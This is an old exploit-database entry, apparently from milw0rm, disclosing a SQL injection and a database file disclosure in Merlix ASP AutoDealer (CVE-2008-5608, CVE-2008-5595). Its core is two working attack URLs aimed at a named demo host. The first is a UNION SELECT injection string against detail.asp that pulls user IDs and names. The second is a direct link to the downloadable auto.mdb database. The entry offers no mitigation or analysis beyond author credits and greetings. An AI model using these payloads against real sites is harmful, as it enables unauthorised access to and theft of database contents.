[] NeoSense

ASP AutoDealer - SQL Injection / File Disclosure

Author: AlpHaNiX
type: webapps
platform: asp
port: 
date_added: 2008-12-04 
date_updated: 2016-10-27 
verified: 1 
codes: OSVDB-50841;CVE-2008-5608;OSVDB-50609;CVE-2008-5595 
tags: 
aliases:  
screenshot_url:  
application_url: 

###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################


---------------------------- Tunisia Muslim ------------------------------

#found by : OffensiveTrack
#Author   : AlpHaNiX
#website  : www.offensivetrack.org

#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Merlix ASP AutoDealer
#download : null
#Demo     : http://demo.merlix.com/autodealer/



#Exploits :

--=[SQL INJECTION]=--
http://demo.merlix.com/autodealer/detail.asp?ID=-0+union+select+1,null,null,0,null,CDDoorID,null,null,null,null,CDDoorName,null,null,null,null,null,17+from+CDDOOR



--=[DATABASE DISCLOSURE]=--
http://demo.merlix.com/autodealer/auto.mdb


#Greetz For -|-Me!sTeR-|-

###########################################################################

# milw0rm.com [2008-12-05]